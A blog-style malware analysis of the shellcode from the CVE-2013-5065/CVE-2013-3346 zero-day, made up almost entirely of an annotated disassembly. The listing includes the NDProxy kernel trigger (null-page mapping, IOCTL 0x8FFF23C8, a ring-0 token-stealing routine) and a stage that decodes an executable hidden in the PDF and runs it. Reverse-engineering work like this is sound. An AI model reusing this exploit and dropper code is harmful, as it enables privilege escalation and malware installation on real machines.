The Shellcode Used in the latest Zero Day Attack Analysis (CVE-2013-5065&CVE-2013-3346)

Now I show the shellcode and show what the shellcode do.
That’s a cool thing to analyze the 0day attacking sample.

00401000 > $  E8 00000000   call    00401005
00401005   $  5D            pop     ebp
00401006   .  83ED 05       sub     ebp, 5   // get the base addr.
00401009   .  E9 8B000000   jmp     00401099
0040100E  /$  52            push    edx
0040100F  |.  50            push    eax
00401010  |.  31D2          xor     edx, edx
00401012  |>  31C0          /xor     eax, eax //in this function
00401014  |.  80F9 01       |cmp     cl, 1
00401017  |.  75 04         |jnz     short 0040101D
00401019  |.  66:AD         |lods    word ptr [esi]
0040101B  |.  EB 01         |jmp     short 0040101E
0040101D  |>  AC            |lods    byte ptr [esi]
0040101E  |>  3C 00         |cmp     al, 0
00401020  |.  74 0D         |je      short 0040102F
00401022  |.  3C 61         |cmp     al, 61
00401024  |.  72 02         |jb      short 00401028
00401026  |.  2C 20         |sub     al, 20
00401028  |>  C1CA 0D       |ror     edx, 0D
0040102B  |.  01C2          |add     edx, eax           hash = (al - 20) + ror(hash)
0040102D  |.^ EB E3         \jmp     short 00401012     //
0040102F  |>  39DA          cmp     edx, ebx
00401031  |.  58            pop     eax
00401032  |.  5A            pop     edx
00401033  \.  C3            retn
00401034  /$  56            push    esi // 
00401035  |.  89DA          mov     edx, ebx
00401037  |.  B2 3C         mov     dl, 3C
00401039  |.  31C0          xor     eax, eax
0040103B  |.  66:8B02       mov     ax, word ptr [edx]
0040103E  |.  01D8          add     eax, ebx
00401040  |.  8B50 78       mov     edx, dword ptr [eax+78]
00401043  |.  01DA          add     edx, ebx
00401045  |>  52            /push    edx
00401046  |.  51            |push    ecx
00401047  |.  8B4A 18       |mov     ecx, dword ptr [edx+18]
0040104A  |.  8B42 20       |mov     eax, dword ptr [edx+20]
0040104D  |.  01D8          |add     eax, ebx
0040104F  |>  8B38          |/mov     edi, dword ptr [eax]
00401051  |.  01DF          ||add     edi, ebx
00401053  |.  53            ||push    ebx
00401054  |.  8B1E          ||mov     ebx, dword ptr [esi]
00401056  |.  87F7          ||xchg    edi, esi
00401058  |.  51            ||push    ecx
00401059  |.  31C9          ||xor     ecx, ecx
0040105B  |.  E8 AEFFFFFF   ||call    0040100E
00401060  |.  59            ||pop     ecx
00401061  |.  5B            ||pop     ebx
00401062  |.  87F7          ||xchg    edi, esi
00401064  |.  75 02         ||jnz     short 00401068
00401066  |.  EB 08         ||jmp     short 00401070
00401068  |>  83C0 04       ||add     eax, 4
0040106B  |.  49            ||dec     ecx
0040106C  |.  E3 22         ||jecxz   short 00401090
0040106E  |.^ EB DF         |\jmp     short 0040104F
00401070  |>  8B42 18       |mov     eax, dword ptr [edx+18]
00401073  |.  29C8          |sub     eax, ecx
00401075  |.  89C1          |mov     ecx, eax
00401077  |.  8B42 24       |mov     eax, dword ptr [edx+24]
0040107A  |.  01D8          |add     eax, ebx
0040107C  |.  66:8B0C48     |mov     cx, word ptr [eax+ecx*2]
00401080  |.  8B42 1C       |mov     eax, dword ptr [edx+1C]
00401083  |.  01D8          |add     eax, ebx
00401085  |.  C1E1 02       |shl     ecx, 2
00401088  |.  01C8          |add     eax, ecx
0040108A  |.  8B00          |mov     eax, dword ptr [eax]
0040108C  |.  01D8          |add     eax, ebx
0040108E  |.  8906          |mov     dword ptr [esi], eax
00401090  |>  59            |pop     ecx
00401091  |.  5A            |pop     edx
00401092  |.  83C6 04       |add     esi, 4
00401095  |.^ E2 AE         \loopd   short 00401045
00401097  |.  5E            pop     esi
00401098  \.  C3            retn
00401099   >  31D2          xor     edx, edx
0040109B   .  64:8B52 30    mov     edx, dword ptr fs:[edx+30]
0040109F   .  8B52 0C       mov     edx, dword ptr [edx+C]
004010A2   .  8B52 14       mov     edx, dword ptr [edx+14]
004010A5   .  B1 01         mov     cl, 1
004010A7   >  8B72 28       mov     esi, dword ptr [edx+28] // get the ntdll.dll kernel.dll
004010AA   .  BB 17CA2B6E   mov     ebx, 6E2BCA17 // to compare the hash
004010AF   .  E8 5AFFFFFF   call    0040100E // to compare the hash with the filename.
004010B4   .  8B5A 10       mov     ebx, dword ptr [edx+10]
004010B7   .  8B12          mov     edx, dword ptr [edx]
004010B9   .^ 75 EC         jnz     short 004010A7 // jump to compare again.
004010BB   .  31C9          xor     ecx, ecx //now we get the kernel32.dll 
004010BD   .  B1 0E         mov     cl, 0E
//all those are the function hash 
004010BF   .  68 7CFA9615   push    1596FA7C //SetFilePointer
004010C4   .  68 E65C780F   push    0F785CE6 //ReadFile
004010C9   .  68 7D93FABD   push    BDFA937D //GetFileSize
004010CE   .  68 2096EA95   push    95EA9620 //GetTempFileNameA
004010D3   .  68 1BBE091A   push    1A09BE1B //GetTempPathA
004010D8   .  68 DA8B7AAE   push    AE7A8BDA //CloseHandle
004010DD   .  68 EF6C88E6   push    E6886CEF //WriteFile
004010E2   .  68 68F6880D   push    0D88F668 //WinExec
004010E7   .  68 76468B8A   push    8A8B4676 //LoadlibraryA
004010EC   .  68 CA6A2A95   push    952A6ACA //GetCurrentProcessId
004010F1   .  68 950B7F1A   push    1A7F0B95 //CreateFileA
004010F6   .  68 453C9E57   push    579E3C45 //DeviceIoControl
004010FB   .  68 1CBE2E30   push    302EBE1C //VirtualAlloc
00401100   .  68 4ECCDF12   push    12DFCC4E //ExitProcess
00401105   .  89E6          mov     esi, esp
00401107   .  E8 28FFFFFF   call    00401034    //now we get all the function address.
0040110C   .  8DBD 0E040000 lea     edi, dword ptr [ebp+40E]
00401112   .  6A 0C         push    0C
00401114   .  59            pop     ecx
00401115   >  8037 C8       xor     byte ptr [edi], 0C8
00401118   .  47            inc     edi
00401119   .^ E2 FA         loopd   short 00401115 // decode the data offset 0x40E.
0040111B   .  6A 6C         push    6C
0040111D   .  68 6E74646C   push    6C64746E
00401122   .  54            push    esp
00401123   .  FF56 14       call    dword ptr [esi+14] //loadlibrary
00401126   .  83F8 00       cmp     eax, 0 //
00401129   .  0F84 D4010000 je      00401303
0040112F   .  56            push    esi
00401130   .  31C9          xor     ecx, ecx
00401132   .  41            inc     ecx
00401133   .  89C3          mov     ebx, eax
00401135   .  68 91FD4759   push    5947FD91 //ZwAllocateVirtualMemory
0040113A   .  89E6          mov     esi, esp
0040113C   .  E8 F3FEFFFF   call    00401034 // get the function ZwAllocateVirtualMemory
00401141   .  6A 01         push    1
00401143   .  89E7          mov     edi, esp
00401145   .  68 00200000   push    2000
0040114A   .  89E1          mov     ecx, esp
0040114C   .  6A 40         push    40
0040114E   .  68 00301000   push    103000
00401153   .  51            push    ecx
00401154   .  6A 00         push    0
00401156   .  57            push    edi
00401157   .  6A FF         push    -1
00401159   .  FF16          call    dword ptr [esi] // call function 
NTSTATUS ZwAllocateVirtualMemory(
  _In_     HANDLE ProcessHandle,
  _Inout_  PVOID *BaseAddress,
  _In_     ULONG_PTR ZeroBits,
  _Inout_  PSIZE_T RegionSize,
  _In_     ULONG AllocationType,
  _In_     ULONG Protect
);

ZwAllocateVirtualMemory(
-1, &addr(1),0,&addr2(0x2000),0x00103000,0x40,
)

0040115B   .  59            pop     ecx
0040115C   .  59            pop     ecx
0040115D   .  5E            pop     esi
0040115E   .  5E            pop     esi
0040115F   .  83F8 00       cmp     eax, 0
00401162   .  0F85 9B010000 jnz     00401303 //if execute error, jump here.
00401168   .  B0 90         mov     al, 90
0040116A   .  FC            cld
0040116B   .  89CF          mov     edi, ecx
0040116D   .  B9 F50E0000   mov     ecx, 0EF5
00401172   .  F3:AA         rep     stos byte ptr es:[edi] //
{
write 90{repeat 0x0ef5 times} into 00000000 
}
00401174   .  56            push    esi
00401175   .  B9 0B010000   mov     ecx, 10B
0040117A   .  8DB5 03030000 lea     esi, dword ptr [ebp+303]
00401180   .  F3:A4         rep     movs byte ptr es:[edi], byte ptr>
{
copy 0x401303 code to 00000ef5, size 0x10b.

}
00401182   .  5E            pop     esi
00401183   .  FF56 10       call    dword ptr [esi+10] //now get current process id.
00401186   .  8907          mov     dword ptr [edi], eax //move to edi.
00401188   .  8D85 0E040000 lea     eax, dword ptr [ebp+40E] //
0040118E   .  6A 00         push    0
00401190   .  6A 00         push    0
00401192   .  6A 03         push    3
00401194   .  6A 00         push    0
00401196   .  6A 00         push    0
00401198   .  6A 00         push    0
0040119A   .  50            push    eax
0040119B   .  FF56 0C       call    dword ptr [esi+C] //call CreateFileA
{
CreateFileA(\\.\NDProxy,0,0,0,3,0,0);
}
0040119E   .  83F8 00       cmp     eax, 0
004011A1   .  0F84 5C010000 je      00401303
004011A7   .  89C7          mov     edi, eax
004011A9   .  6A 04         push    4
004011AB   .  68 00100000   push    1000
004011B0   .  68 00040000   push    400
004011B5   .  6A 00         push    0
004011B7   .  FF56 04       call    dword ptr [esi+4]//call VirtualAlloc
{
VirtualAlloc(0,400,1000,4);
}
004011BA   .  83F8 00       cmp     eax, 0
004011BD   .  0F84 40010000 je      00401303
//now mov something into the heap.
004011C3   .  C740 14 25010>mov     dword ptr [eax+14], 7030125
004011CA   .  C740 1C AD000>mov     dword ptr [eax+1C], 0AD
004011D1   .  C740 2C 20000>mov     dword ptr [eax+2C], 20
004011D8   .  C740 30 04000>mov     dword ptr [eax+30], 4
004011DF   .  C740 38 EFBEA>mov     dword ptr [eax+38], DEADBEEF
{
heap_buffer[14] = 0x7030125;
heap_buffer[1c] = 0xad;
heap_buffer[2c] = 0x20;
heap_buffer[30] = 4;
heap_buffer[38] = 0xdeadbeef; 
}
004011E6   .  6A 00         push    0
004011E8   .  89E2          mov     edx, esp
004011EA   .  6A 00         push    0
004011EC   .  52            push    edx
004011ED   .  68 80000000   push    80
004011F2   .  50            push    eax
004011F3   .  68 00040000   push    400
004011F8   .  50            push    eax
004011F9   .  68 C823FF8F   push    8FFF23C8
004011FE   .  57            push    edi
004011FF   .  FF56 08       call    dword ptr [esi+8]
{
DeviceIoControl(&filehandle,0x8fff23c8,heap_buffer,400,heap_buffer,80,0,0)
}
00401202   .  31DB          xor     ebx, ebx
00401204   .  55            push    ebp
00401205   .  52            push    edx
00401206   .  89E7          mov     edi, esp
00401208   .  52            push    edx
00401209   >  83C3 04       add     ebx, 4
0040120C   .  31C0          xor     eax, eax
0040120E   .  50            push    eax
0040120F   .  50            push    eax
00401210   .  50            push    eax
00401211   .  53            push    ebx
00401212   .  FF56 34       call    dword ptr [esi+34] // call SetFilePointer
{
//Moves the file pointer of the specified file.
SetFilePointer(4,0,0,0)
//to get a existed file handler?
}
00401215   .  83F8 FF       cmp     eax, -1
00401218   .^ 74 EF         je      short 00401209
0040121A   .  31C0          xor     eax, eax
0040121C   .  50            push    eax
0040121D   .  53            push    ebx
0040121E   .  FF56 2C       call    dword ptr [esi+2C] // call GetFileSize
{
GetFileSize();
}
00401221   .  83F8 FF       cmp     eax, -1
00401224   .^ 74 E3         je      short 00401209
00401226   .  3D 00100000   cmp     eax, 1000
0040122B   .^ 7C DC         jl      short 00401209 //
{
if (file_size == 0 && file_size < 1000) continue;
}
0040122D   .  89C5          mov     ebp, eax
0040122F   .  89E0          mov     eax, esp
00401231   .  31C9          xor     ecx, ecx
00401233   .  51            push    ecx
00401234   .  50            push    eax
00401235   .  6A 04         push    4
00401237   .  57            push    edi
00401238   .  53            push    ebx
00401239   .  FF56 30       call    dword ptr [esi+30] //ReadFile,now we read this File we got.
0040123C   .  813F 25504446 cmp     dword ptr [edi], 46445025 // compare the magic code "%PDF"
00401242   .^ 75 C5         jnz     short 00401209 //if not continue.
00401244   .  83C4 08       add     esp, 8
00401247   .  89EF          mov     edi, ebp
00401249   .  5D            pop     ebp
0040124A   .  83EF 04       sub     edi, 4
0040124D   .  6A 04         push    4
0040124F   .  68 00100000   push    1000
00401254   .  57            push    edi
00401255   .  6A 00         push    0
00401257   .  FF56 04       call    dword ptr [esi+4] //VirtualAlloc
{
VirtualAlloc(0,edi(start address of PDF),1000,4);
}
0040125A   .  31C9          xor     ecx, ecx
0040125C   .  50            push    eax
0040125D   .  51            push    ecx
0040125E   .  54            push    esp
0040125F   .  57            push    edi
00401260   .  50            push    eax
00401261   .  53            push    ebx
00401262   .  FF56 30       call    dword ptr [esi+30] // ReadFile

00401265   .  58            pop     eax
00401266   .  89F9          mov     ecx, edi
00401268   .  31D2          xor     edx, edx
0040126A   >  80FA 01       cmp     dl, 1
0040126D   .  74 11         je      short 00401280
0040126F   .  8138 F209090A cmp     dword ptr [eax], 0A0909F2 //the magic code in the pdf in the obj 4.
00401275   .  75 1E         jnz     short 00401295 //
00401277   .  83C0 04       add     eax, 4
{ // now we decode the obj 4 stream.
0040127A   .  FEC2          inc     dl
0040127C   .  50            push    eax
0040127D   .  89FB          mov     ebx, edi
0040127F   .  57            push    edi
00401280   >  56            push    esi
00401281   .  52            push    edx
00401282   .  50            push    eax
00401283   .  89C6          mov     esi, eax
00401285   .  89DA          mov     edx, ebx
00401287   .  29FA          sub     edx, edi
00401289   .  89D0          mov     eax, edx
0040128B   .  F6E2          mul     dl
eax = (edx-edi)*dl
0040128D   .  2806          sub     byte ptr [esi], al
0040128F   .  8036 F3       xor     byte ptr [esi], 0F3

esi = (esi - al) xor f3.

00401292   .  58            pop     eax
00401293   .  5A            pop     edx
00401294   .  5E            pop     esi
00401295   >  40            inc     eax
00401296   .  4F            dec     edi
00401297   .^ E2 D1         loopd   short 0040126A //
//through the decode, we get the malicous exe file.

00401299   .  5F            pop     edi
0040129A   .  58            pop     eax
0040129B   .  81EC C8000000 sub     esp, 0C8
004012A1   .  89E3          mov     ebx, esp
004012A3   .  83EC 0C       sub     esp, 0C
004012A6   .  50            push    eax
004012A7   .  53            push    ebx
004012A8   .  68 C8000000   push    0C8
004012AD   .  FF56 24       call    dword ptr [esi+24] // GetTempPathA.
004012B0   .  8D43 FC       lea     eax, dword ptr [ebx-4]
004012B3   .  31C9          xor     ecx, ecx
004012B5   .  8908          mov     dword ptr [eax], ecx
004012B7   .  53            push    ebx
004012B8   .  51            push    ecx
004012B9   .  50            push    eax
004012BA   .  53            push    ebx
004012BB   .  FF56 28       call    dword ptr [esi+28] // GetTempFileNameA

004012BE   .  C743 FC 2F632>mov     dword ptr [ebx-4], 2020632F
004012C5   .  C743 F8 636D6>mov     dword ptr [ebx-8], 20646D63
004012CC   .  58            pop     eax
004012CD   .  89C5          mov     ebp, eax
004012CF   .  31C9          xor     ecx, ecx
004012D1   .  51            push    ecx
004012D2   .  51            push    ecx
004012D3   .  6A 02         push    2
004012D5   .  51            push    ecx
004012D6   .  51            push    ecx
004012D7   .  68 00000040   push    40000000
004012DC   .  53            push    ebx
004012DD   .  FF56 0C       call    dword ptr [esi+C] //CreateFileA.

004012E0   .  83EB 08       sub     ebx, 8
004012E3   .  53            push    ebx
004012E4   .  89C3          mov     ebx, eax
004012E6   .  31C9          xor     ecx, ecx
004012E8   .  51            push    ecx
004012E9   .  89E0          mov     eax, esp
004012EB   .  51            push    ecx
004012EC   .  50            push    eax
004012ED   .  57            push    edi
004012EE   .  55            push    ebp
004012EF   .  53            push    ebx
004012F0   .  FF56 1C       call    dword ptr [esi+1C] //WriteFile
004012F3   .  53            push    ebx
004012F4   .  FF56 20       call    dword ptr [esi+20] //CloseHandle
004012F7   .  58            pop     eax
004012F8   .  5B            pop     ebx
004012F9   .  31C0          xor     eax, eax
004012FB   .  6A 00         push    0
004012FD   .  53            push    ebx
004012FE   .  FF56 18       call    dword ptr [esi+18] //WinExec
00401301   .  FF16          call    dword ptr [esi] // ExitProcess
-----
this code is copy to the ring0 to exec.
--begain
00401303   >  60            pushad                 // jump here.
00401304   .  E8 00000000   call    00401309
00401309   $  5B            pop     ebx
0040130A   .  83EB 06       sub     ebx, 6
0040130D   .  8B4D 00       mov     ecx, dword ptr [ebp]
00401310   .  8B49 04       mov     ecx, dword ptr [ecx+4]
00401313   .  81E1 00F0FFFF and     ecx, FFFFF000
00401319   >  66:8139 4D5A  cmp     word ptr [ecx], 5A4D
0040131E   .  0F84 93000000 je      004013B7
00401324   .  81E9 00100000 sub     ecx, 1000
0040132A   .^ EB ED         jmp     short 00401319
0040132C  /$  52            push    edx
0040132D  |.  50            push    eax
0040132E  |.  31D2          xor     edx, edx
00401330  |>  31C0          /xor     eax, eax
00401332  |.  80F9 01       |cmp     cl, 1
00401335  |.  75 04         |jnz     short 0040133B
00401337  |.  66:AD         |lods    word ptr [esi]
00401339  |.  EB 01         |jmp     short 0040133C
0040133B  |>  AC            |lods    byte ptr [esi]
0040133C  |>  3C 00         |cmp     al, 0
0040133E  |.  74 0D         |je      short 0040134D
00401340  |.  3C 61         |cmp     al, 61
00401342  |.  72 02         |jb      short 00401346
00401344  |.  2C 20         |sub     al, 20
00401346  |>  C1CA 0D       |ror     edx, 0D
00401349  |.  01C2          |add     edx, eax
0040134B  |.^ EB E3         \jmp     short 00401330
0040134D  |>  39DA          cmp     edx, ebx
0040134F  |.  58            pop     eax
00401350  |.  5A            pop     edx
00401351  \.  C3            retn
00401352  /$  56            push    esi
00401353  |.  89DA          mov     edx, ebx
00401355  |.  B2 3C         mov     dl, 3C
00401357  |.  31C0          xor     eax, eax
00401359  |.  66:8B02       mov     ax, word ptr [edx]
0040135C  |.  01D8          add     eax, ebx
0040135E  |.  8B50 78       mov     edx, dword ptr [eax+78]
00401361  |.  01DA          add     edx, ebx
00401363  |>  52            /push    edx
00401364  |.  51            |push    ecx
00401365  |.  8B4A 18       |mov     ecx, dword ptr [edx+18]
00401368  |.  8B42 20       |mov     eax, dword ptr [edx+20]
0040136B  |.  01D8          |add     eax, ebx
0040136D  |>  8B38          |/mov     edi, dword ptr [eax]
0040136F  |.  01DF          ||add     edi, ebx
00401371  |.  53            ||push    ebx
00401372  |.  8B1E          ||mov     ebx, dword ptr [esi]
00401374  |.  87F7          ||xchg    edi, esi
00401376  |.  51            ||push    ecx
00401377  |.  31C9          ||xor     ecx, ecx
00401379  |.  E8 AEFFFFFF   ||call    0040132C
0040137E  |.  59            ||pop     ecx
0040137F  |.  5B            ||pop     ebx
00401380  |.  87F7          ||xchg    edi, esi
00401382  |.  75 02         ||jnz     short 00401386
00401384  |.  EB 08         ||jmp     short 0040138E
00401386  |>  83C0 04       ||add     eax, 4
00401389  |.  49            ||dec     ecx
0040138A  |.  E3 22         ||jecxz   short 004013AE
0040138C  |.^ EB DF         |\jmp     short 0040136D
0040138E  |>  8B42 18       |mov     eax, dword ptr [edx+18]
00401391  |.  29C8          |sub     eax, ecx
00401393  |.  89C1          |mov     ecx, eax
00401395  |.  8B42 24       |mov     eax, dword ptr [edx+24]
00401398  |.  01D8          |add     eax, ebx
0040139A  |.  66:8B0C48     |mov     cx, word ptr [eax+ecx*2]
0040139E  |.  8B42 1C       |mov     eax, dword ptr [edx+1C]
004013A1  |.  01D8          |add     eax, ebx
004013A3  |.  C1E1 02       |shl     ecx, 2
004013A6  |.  01C8          |add     eax, ecx
004013A8  |.  8B00          |mov     eax, dword ptr [eax]
004013AA  |.  01D8          |add     eax, ebx
004013AC  |.  8906          |mov     dword ptr [esi], eax
004013AE  |>  59            |pop     ecx
004013AF  |.  5A            |pop     edx
004013B0  |.  83C6 04       |add     esi, 4
004013B3  |.^ E2 AE         \loopd   short 00401363
004013B5  |.  5E            pop     esi
004013B6  \.  C3            retn
004013B7   >  89DD          mov     ebp, ebx
004013B9   .  89CB          mov     ebx, ecx
004013BB   .  31C9          xor     ecx, ecx
004013BD   .  41            inc     ecx
004013BE   .  68 74C9AC4A   push    4AACC974
004013C3   .  89E6          mov     esi, esp
004013C5   .  E8 88FFFFFF   call    00401352
004013CA   .  6A 00         push    0
004013CC   .  89E7          mov     edi, esp
004013CE   .  57            push    edi
004013CF   .  8B85 0B010000 mov     eax, dword ptr [ebp+10B]
004013D5   .  50            push    eax
004013D6   .  FF16          call    dword ptr [esi]
004013D8   .  5F            pop     edi
004013D9   .  83F8 00       cmp     eax, 0
004013DC   .  75 26         jnz     short 00401404
004013DE   .  6A 00         push    0
004013E0   .  89E0          mov     eax, esp
004013E2   .  50            push    eax
004013E3   .  6A 04         push    4
004013E5   .  FF16          call    dword ptr [esi]
004013E7   .  5E            pop     esi
004013E8   .  83F8 00       cmp     eax, 0
004013EB   .  75 17         jnz     short 00401404
004013ED   .  81C6 C8000000 add     esi, 0C8
004013F3   .  81C7 C8000000 add     edi, 0C8
004013F9   .  8B06          mov     eax, dword ptr [esi]
004013FB   .  8907          mov     dword ptr [edi], eax
004013FD   .  C747 6C 00000>mov     dword ptr [edi+6C], 0
00401404   >  58            pop     eax
00401405   .  61            popad
00401406   .  B8 01010000   mov     eax, 101
0040140B   .  C2 0400       retn    4
--end
------
{ //decode the code here.
  // xor the code with 0xc8
  //\\.\NDProxy
0040140E      94            db      94
0040140F      94            db      94
00401410      E6            db      E6
00401411      94            db      94
00401412      86            db      86
00401413      8C            db      8C
00401414      98            db      98
00401415      BA            db      BA
00401416      A7            db      A7
00401417      B0            db      B0
00401418      B1            db      B1
00401419      C8            db      C8
}

现有 3 条评论

  1. ringz3r0 2013/12/09 pm 5:43

    你是怎么获得这些poc的呀?

    Reply

发表评论

带 * 的是必填项目,电子邮件地址不会被公开。
文字的交流也是情感的交流,技能的交流也是学术的交流。

Are you human? Click the Pineapple...